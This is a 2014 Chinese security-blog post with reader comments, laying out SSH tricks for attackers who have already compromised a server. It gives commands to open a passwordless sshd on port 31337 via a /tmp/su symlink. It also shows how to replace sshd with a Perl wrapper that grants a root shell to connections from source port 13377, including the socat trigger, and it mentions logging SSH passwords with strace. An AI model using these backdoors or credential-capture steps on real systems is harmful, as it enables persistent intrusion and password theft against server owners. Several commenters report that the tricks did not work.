<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">渗透技巧之SSH篇</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">mickey</a> <span class="bull">·</span> <time title="2014/05/12 13:57" ui-time="" datetime="2014/05/12 13:57" class="published ng-binding ng-isolate-scope">2014/05/12 13:57</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p></p><p>用些小技巧，蒙蒙菜鸟管理员。</p><h3>1. 入侵得到SHELL后，对方防火墙没限制，想快速开放一个可以访问的SSH端口</h3><p>肉鸡上执行</p><pre><code>#!bash
<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="bdd0d4ded6d8c4fdcbd4de">[email&#160;protected]</a>:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 
</code></pre><p>就会派生一个31337端口，然后连接31337，用root/bin/ftp/mail当用户名，密码随意，就可登陆。</p><p>效果图：</p><p><img alt="enter image description here" img-src="2e30d14a59ea7777cda947d115173921cc016286.jpg"></p><h3>2. 做一个SSH wrapper后门，效果比第一个好，没有开放额外的端口，只要对方开了SSH服务，就能远程连接</h3><p>在肉鸡上执行：</p><pre><code>#!bash
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="5a2835352e1a3635393b363235292e">[email&#160;protected]</a> ~]# cd /usr/sbin
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="ea9885859eaa8685898b868285999e">[email&#160;protected]</a> sbin]# mv sshd ../bin
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="84f6ebebf0c4e8ebe7e5e8ecebf7f0">[email&#160;protected]</a> sbin]# echo '#!/usr/bin/perl' &gt;sshd
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="98eaf7f7ecd8f4f7fbf9f4f0f7ebec">[email&#160;protected]</a> sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' &gt;&gt;sshd
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="c0b2afafb480acafa3a1aca8afb3b4">[email&#160;protected]</a> sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' &gt;&gt;sshd
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="394b56564d7955565a585551564a4d">[email&#160;protected]</a> sbin]# chmod u+x sshd
[<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="1a6875756e5a7675797b767275696e">[email&#160;protected]</a> sbin]# /etc/init.d/sshd restart
</code></pre><p>在本机执行：</p><pre><code>#!bash
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
</code></pre><p>如果你想修改源端口，可以用python的struct标准库实现</p><pre><code>#!python
&gt;&gt;&gt; import struct
&gt;&gt;&gt; buffer = struct.pack('&gt;I6',19526)
&gt;&gt;&gt; print repr(buffer)
'\x00\x00LF'
&gt;&gt;&gt; buffer = struct.pack('&gt;I6',13377)
&gt;&gt;&gt; print buffer
4A
</code></pre><p>效果图如下：</p><p><img alt="enter image description here" img-src="2014091812470923422.png"></p><h3>3. 记录SSH客户端连接密码</h3><p>搞定主机后，往往想记录肉鸡SSH连接到其他主机的密码，进一步扩大战果，使用strace命令就行了。</p><p>效果图：</p><p><img alt="enter image description here" img-src="bbceff9ee795e8fcc01f6383eed5f1a80ab84182.jpg"></p><p></p></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy;乌云知识库版权所有 未经许可 禁止转载</span></div></div><div class="yarpp-related"><h3>为您推荐了适合您的技术文章:</h3><ol id="recommandsystem"><li><a href="http://drops.wooyun.org/papers/4525" rel="bookmark" id="re1">31C3 CTF web关writeup</a></li><li><a href="http://drops.wooyun.org/tips/12673" rel="bookmark" id="re2">Elasticsearch集群的备份与恢复</a></li><li><a href="http://drops.wooyun.org/tips/2288" rel="bookmark" id="re3">64位Linux下的栈溢出</a></li><li><a href="http://drops.wooyun.org/papers/3064" rel="bookmark" id="re4">CVE-2014-6271资料汇总</a></li></ol></div><div id="comments" class="comment-list clearfix"><div id="comment-list"><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">niexinming</span> <span class="reply-time">2016-02-01 12:48:35</span></div><p></p><p>表示：都没有成功，23333</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">ki11y0u</span> <span class="reply-time">2016-01-29 21:14:11</span></div><p></p><p>第二个，centos测试不成功。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">赞</span> <span class="reply-time">2015-11-09 00:10:25</span></div><p></p><p>第一个表示，没有成功</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-28 15:26:25</span></div><p></p><p>米奇大神，写的有点不准啊。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-28 15:00:35</span></div><p></p><p>方便加下联系方式吗。qq啥的。有很多问题要请教啊</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-28 14:56:45</span></div><p></p><p>你好，我想和你探讨一下，第一条中，你说把22端口衍生到31337上，完了之后外面连接31337.用户名为root/bin/ftp/mail，密码随意，我测试的为什么是必须输入正确的用户名密码呢。大神求解释啊，大神用root/bin/ftp/mail这个用户、随意密码登陆成功了吗。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-27 08:28:02</span></div><p></p><p>想请教一下，那个ln的命令在linux、unix还有一些unix类的机器都试用吗。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Mr丶Mario</span> <span class="reply-time">2014-12-30 19:54:10</span></div><p></p><p>那个图我还一直以为没加载完。刷新了一次。尴尬。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Ivan</span> <span class="reply-time">2014-12-22 12:04:52</span></div><p></p><p>mark</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">gm100861</span> <span class="reply-time">2014-06-23 10:01:05</span></div><p></p><p>太牛逼了，学习。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Bloodwolf</span> <span class="reply-time">2014-05-21 11:02:44</span></div><p></p><p>对于想长期控制的服务器还是上内核后门好玩</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">带馅儿馒头</span> <span class="reply-time">2014-05-18 15:23:03</span></div><p></p><p>感谢分享~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">ACGT</span> <span class="reply-time">2014-05-16 18:32:46</span></div><p></p><p>神奇，怎么找到的？搜索还是平时积累？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">冷冷的夜</span> <span class="reply-time">2014-05-16 11:40:36</span></div><p></p><p>不错不错，实用</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xiaoL</span> <span class="reply-time">2014-05-15 16:11:58</span></div><p></p><p>话说我第一个tip<br>没试验成功啊- -</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">12345</span> <span class="reply-time">2014-05-15 10:22:18</span></div><p></p><p>来鼓掌！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">tom</span> <span class="reply-time">2014-05-14 14:01:25</span></div><p></p><p>mark<br>补一下文章来源<br>http://pastebin.com/2NgL8SDE<br>http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/<br>https://diogomonica.com/posts/poor-man-s-ssh-keylogger/</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Seven.Sea</span> <span class="reply-time">2014-05-14 13:59:23</span></div><p></p><p>Mark，简单实用</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">动后河</span> <span class="reply-time">2014-05-13 23:45:53</span></div><p></p><p>strace<br>还不明白</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">laterain</span> <span class="reply-time">2014-05-13 10:57:56</span></div><p></p><p>技巧很使用啊，赞x32<br>终于可以不再跑那个该死的root密码了</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Xeyes</span> <span class="reply-time">2014-05-13 10:48:44</span></div><p></p><p>好文~~~~~ 收藏.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">L.N.</span> <span class="reply-time">2014-05-12 19:59:28</span></div><p></p><p>必须赞一个！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">insight-labs</span> <span class="reply-time">2014-05-12 18:32:48</span></div><p></p><p>学习了~~，顶Mickey哥~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xiaoL</span> <span class="reply-time">2014-05-12 16:43:44</span></div><p></p><p>简洁实用！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Kavia</span> <span class="reply-time">2014-05-12 16:15:57</span></div><p></p><p>mickey大牛又出大作了，好爽！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">livers</span> <span class="reply-time">2014-05-12 16:01:11</span></div><p></p><p>顶 mickey!</p><p></p></div></div></div></div></div></main>